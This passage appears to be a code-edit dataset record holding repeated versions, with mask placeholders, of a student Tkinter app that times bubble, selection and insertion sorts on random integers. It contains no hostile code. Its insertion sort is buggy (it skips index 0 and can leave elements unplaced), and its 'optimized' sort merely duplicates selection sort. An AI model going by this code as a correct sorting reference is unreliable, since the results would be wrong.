'\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', 
runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n 
print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n 
hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', 
runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n 
print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n 
hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\nmain()\n",
"step-4": "from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport random\nimport numpy as np\nimport timeit\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = 
timeit.default_timer()\n bbsort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bbs_time.config(text='% .12f' % runtime)\n bbs_time.place(x=420, y=185)\n\n def iss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### INSERTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n issort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n iss_time.config(text='% .12f' % runtime)\n iss_time.place(x=545, y=185)\n\n def sss_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### SELECTION SORT '\n )\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', angka)\n start = timeit.default_timer()\n sssort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n sss_time.config(text='% .12f' % runtime)\n sss_time.place(x=670, y=185)\n\n def bsi_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print('#################################################### BSI')\n hasil_listbox_widget.delete(0, tk.END)\n angka = list(listbox_widget.get(0, tk.END))\n print('Data Sample \\n', 
angka)\n start = timeit.default_timer()\n bisort(angka)\n stop = timeit.default_timer()\n runtime = stop - start\n print('\\n Hasil Sorting \\n', angka)\n print('RunTime : ', runtime)\n print('Jumlah data : ', len(angka))\n for hasil_entry in angka:\n hasil_listbox_widget.insert(tk.END, hasil_entry)\n bsi_time.config(text='% .12f' % runtime)\n bsi_time.place(x=570, y=333)\n\n def generate(entry):\n listbox_widget.delete(0, tk.END)\n l = int(entry)\n listrandom = []\n for i in range(l):\n value = random.randint(1, 1000)\n listrandom.append(value)\n listbox_widget.insert(tk.END, value)\n angka = listrandom\n\n def cls():\n hasil_listbox_widget.delete(0, tk.END)\n print('\\n' * 100)\n menubar = Menu(root)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label='Generate Random Number', command=donothing)\n filemenu.add_command(label='Close', command=exit_editor)\n filemenu.add_separator()\n filemenu.add_command(label='Exit', command=root.quit)\n menubar.add_cascade(label='File', menu=filemenu)\n aboutmenu = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='About', menu=aboutmenu)\n aboutmenu.add_command(label='About', command=about)\n aboutmenu.add_command(label='Help', command=help_box)\n root.config(menu=menubar)\n frame_data = tk.Frame(root)\n frame_data.place(relx=0.128, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n listbox_widget = tk.Listbox(frame_data, selectmode='BROWSE', height=20,\n width=20, background='white')\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\n listbox_widget_scrl.configure(command=listbox_widget.yview)\n listbox_widget.grid(row=1, sticky=W)\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n frame_hasil = tk.Frame(root)\n frame_hasil.place(relx=0.34, rely=0.14, relwidth=0.18, relheight=0.65,\n anchor='n')\n hasil_listbox_widget = tk.Listbox(frame_hasil, selectmode='BROWSE',\n height=20, width=20, background='white')\n 
hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\n hasil_listbox_widget.grid(row=1, sticky=W)\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\n entry = tk.Entry(root, font=40, width=7)\n entry.place(x=105, y=450)\n bbs_button = tk.Button(root, text='START', font=40, command=bbs_respon\n ).place(x=434, y=140)\n iss_button = tk.Button(root, text='START', font=40, command=iss_respon\n ).place(x=555, y=140)\n sss_button = tk.Button(root, text='START', font=40, command=sss_respon\n ).place(x=680, y=140)\n bsi_button = tk.Button(root, text='START', font=40, command=bsi_respon\n ).place(x=466, y=330)\n gen_button = tk.Button(root, text='GENERATE', font=40, command=lambda :\n generate(entry.get()))\n gen_button.place(x=180, y=447)\n cls_button = tk.Button(root, text='CLEAN', font=40, command=cls).place(x\n =295, y=447)\n bbs_time = ttk.Label(root, background='#6367c8', foreground='#fff')\n bbs_time['text'] = 'Respon Time'\n bbs_time.place(x=429, y=185)\n iss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n iss_time['text'] = 'Respon Time'\n iss_time.place(x=555, y=185)\n sss_time = tk.Label(root, background='#6367c8', foreground='#fff')\n sss_time['text'] = 'Respon Time'\n sss_time.place(x=680, y=185)\n bsi_time = tk.Label(root, background='#6367c8', font=40, foreground='#fff')\n bsi_time['text'] = 'Respon Time'\n bsi_time.place(x=570, y=333)\n root.mainloop()\n\n\nmain()\n",
"step-5": "from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\n\r\nimport random\r\nimport numpy as np\r\n\r\nimport timeit\r\n\r\n\r\ndef main():\r\n\r\n root = tk.Tk()\r\n # root.geometry('800x500')\r\n root.resizable(width=False, height=False)\r\n root.title('Tugas Algoritma')\r\n\r\n canvas = tk.Canvas(root, height=500, width=800)\r\n canvas.pack()\r\n\r\n bg = tk.PhotoImage(file='bg.png')\r\n bl = tk.Label(root, image=bg)\r\n bl.place(relwidth=1, relheight=1)\r\n\r\n # root.iconbitmap('icons/pypad.ico')\r\n\r\n ########################################################################\r\n\r\n def about():\r\n messagebox.showinfo(\"About\", \"Simulasi Algoritma Sorting\")\r\n\r\n def help_box(event=None):\r\n messagebox.showinfo(\r\n \"Help\", \"For help email to hai@irfnrdh.com\", icon='question')\r\n\r\n def exit_editor():\r\n if messagebox.askokcancel(\"Quti\", \"Do you really want to quit?\"):\r\n root.destroy()\r\n root.protocol('WM_DELETE_WINDOW', exit_editor)\r\n\r\n def donothing():\r\n print(\"Nothing to do :v\")\r\n\r\n ########################################################################\r\n # Bubble Sort\r\n def bbsort(angka):\r\n for i in range(len(angka)-1, 0, -1):\r\n # swap = False\r\n for j in range(i):\r\n if angka[j] > angka[j+1]:\r\n tampung = angka[j]\r\n angka[j] = angka[j+1]\r\n angka[j+1] = tampung\r\n # swap = True\r\n # if not swap:\r\n # break\r\n\r\n # Selection Sort\r\n\r\n def sssort(angka):\r\n for i in range(len(angka)):\r\n min_idx = i\r\n for j in range(i, len(angka)):\r\n if angka[j] < angka[min_idx]:\r\n min_idx = j\r\n tampung = angka[i]\r\n angka[i] = angka[min_idx]\r\n angka[min_idx] = tampung\r\n\r\n # Insertion Sort\r\n\r\n def issort(angka):\r\n for i in range(1, len(angka)):\r\n idx = angka[i]\r\n for j in range(i-1, 0, -1):\r\n if angka[j] > idx:\r\n angka[j+1] = angka[j]\r\n else:\r\n angka[j+1] = idx\r\n break\r\n\r\n # Bubble+Insertion+Selection Sort 
Optimize\r\n\r\n def bisort(angka):\r\n for i in range(len(angka)):\r\n min_idx = i\r\n for j in range(i, len(angka)):\r\n if angka[j] < angka[min_idx]:\r\n min_idx = j\r\n tampung = angka[i]\r\n angka[i] = angka[min_idx]\r\n angka[min_idx] = tampung\r\n\r\n ########################################################################\r\n\r\n def bbs_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### BUBLE SORT \")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n bbsort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n bbs_time.config(text=\"% .12f\" % runtime)\r\n bbs_time.place(x=420, y=185)\r\n\r\n def iss_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### INSERTION SORT \")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n issort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n iss_time.config(text=\"% .12f\" % runtime)\r\n iss_time.place(x=545, y=185)\r\n\r\n def sss_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### SELECTION SORT \")\r\n 
hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n sssort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n sss_time.config(text=\"% .12f\" % runtime)\r\n sss_time.place(x=670, y=185)\r\n\r\n def bsi_respon():\r\n if len(listbox_widget.get(0, tk.END)) == 0:\r\n print(\"Data Lu mane?\")\r\n else:\r\n print(\"#################################################### BSI\")\r\n hasil_listbox_widget.delete(0, tk.END)\r\n angka = list(listbox_widget.get(0, tk.END))\r\n print(\"Data Sample \\n\", angka)\r\n start = timeit.default_timer()\r\n bisort(angka)\r\n stop = timeit.default_timer()\r\n runtime = stop - start\r\n print(\"\\n Hasil Sorting \\n\", angka)\r\n print('RunTime : ', runtime)\r\n print('Jumlah data : ', len(angka))\r\n\r\n for hasil_entry in angka:\r\n hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n\r\n bsi_time.config(text=\"% .12f\" % runtime)\r\n bsi_time.place(x=570, y=333)\r\n\r\n def generate(entry):\r\n\r\n listbox_widget.delete(0, tk.END)\r\n\r\n l = int(entry)\r\n listrandom = []\r\n for i in range(l):\r\n value = random.randint(1, 1000)\r\n listrandom.append(value)\r\n listbox_widget.insert(tk.END, value)\r\n\r\n angka = listrandom\r\n # print(listrandom)\r\n\r\n # listbox_entries = random.sample(range(100), int(entry))\r\n # for entry in listbox_entries:\r\n # listbox_widget.insert(tk.END, entry)\r\n #angka = listbox_widget.get(0, tk.END)\r\n\r\n def cls():\r\n hasil_listbox_widget.delete(0, tk.END)\r\n print(\"\\n\" * 100)\r\n # print [ listbox_widget.get(i) for i in listbox_widget.curselection()]\r\n\r\n ########################################################################\r\n menubar = 
Menu(root)\r\n\r\n filemenu = Menu(menubar, tearoff=0)\r\n filemenu.add_command(label=\"Generate Random Number\", command=donothing)\r\n filemenu.add_command(label=\"Close\", command=exit_editor)\r\n filemenu.add_separator()\r\n filemenu.add_command(label=\"Exit\", command=root.quit)\r\n\r\n menubar.add_cascade(label=\"File\", menu=filemenu)\r\n\r\n aboutmenu = Menu(menubar, tearoff=0)\r\n menubar.add_cascade(label=\"About\", menu=aboutmenu)\r\n aboutmenu.add_command(label=\"About\", command=about)\r\n aboutmenu.add_command(label=\"Help\", command=help_box)\r\n\r\n root.config(menu=menubar)\r\n\r\n ########################################################################\r\n\r\n # DATA SAMPLING ------------------------------\r\n frame_data = tk.Frame(root)\r\n frame_data.place(relx=0.128, rely=0.140, relwidth=0.18,\r\n relheight=0.65, anchor='n')\r\n\r\n listbox_widget = tk.Listbox(\r\n frame_data, selectmode=\"BROWSE\", height=20, width=20, background='white')\r\n listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)\r\n listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)\r\n listbox_widget_scrl.configure(command=listbox_widget.yview)\r\n\r\n listbox_widget.grid(row=1, sticky=W)\r\n listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\r\n\r\n # DATA HASIL ------------------------------\r\n frame_hasil = tk.Frame(root)\r\n frame_hasil.place(relx=0.34, rely=0.140, relwidth=0.18,\r\n relheight=0.65, anchor='n')\r\n\r\n hasil_listbox_widget = tk.Listbox(\r\n frame_hasil, selectmode=\"BROWSE\", height=20, width=20, background='white')\r\n hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)\r\n hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)\r\n hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)\r\n # hasil_listbox_entries = random.sample(range(100), 10)\r\n # for hasil_entry in hasil_listbox_entries:\r\n # hasil_listbox_widget.insert(tk.END, hasil_entry)\r\n hasil_listbox_widget.grid(row=1, 
sticky=W)\r\n hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)\r\n\r\n # Entry\r\n entry = tk.Entry(root, font=40, width=7)\r\n entry.place(x=105, y=450)\r\n\r\n # BUTTON\r\n bbs_button = tk.Button(root, text=\"START\", font=40,\r\n command=bbs_respon).place(x=434, y=140)\r\n iss_button = tk.Button(root, text=\"START\", font=40,\r\n command=iss_respon).place(x=555, y=140)\r\n sss_button = tk.Button(root, text=\"START\", font=40,\r\n command=sss_respon).place(x=680, y=140)\r\n bsi_button = tk.Button(root, text=\"START\", font=40,\r\n command=bsi_respon).place(x=466, y=330)\r\n # GENERATE DATA SAMPLING\r\n gen_button = tk.Button(root, text=\"GENERATE\", font=40,\r\n command=lambda: generate(entry.get()))\r\n gen_button.place(x=180, y=447)\r\n cls_button = tk.Button(root, text=\"CLEAN\", font=40,\r\n command=cls).place(x=295, y=447)\r\n\r\n # RESPON TIME\r\n bbs_time = ttk.Label(root, background=\"#6367c8\",\r\n foreground=\"#fff\")\r\n bbs_time['text'] = \"Respon Time\"\r\n bbs_time.place(x=429, y=185)\r\n\r\n iss_time = tk.Label(root,\r\n background=\"#6367c8\", foreground=\"#fff\")\r\n iss_time['text'] = \"Respon Time\"\r\n iss_time.place(x=555, y=185)\r\n\r\n sss_time = tk.Label(root,\r\n background=\"#6367c8\", foreground=\"#fff\")\r\n sss_time['text'] = \"Respon Time\"\r\n sss_time.place(x=680, y=185)\r\n\r\n 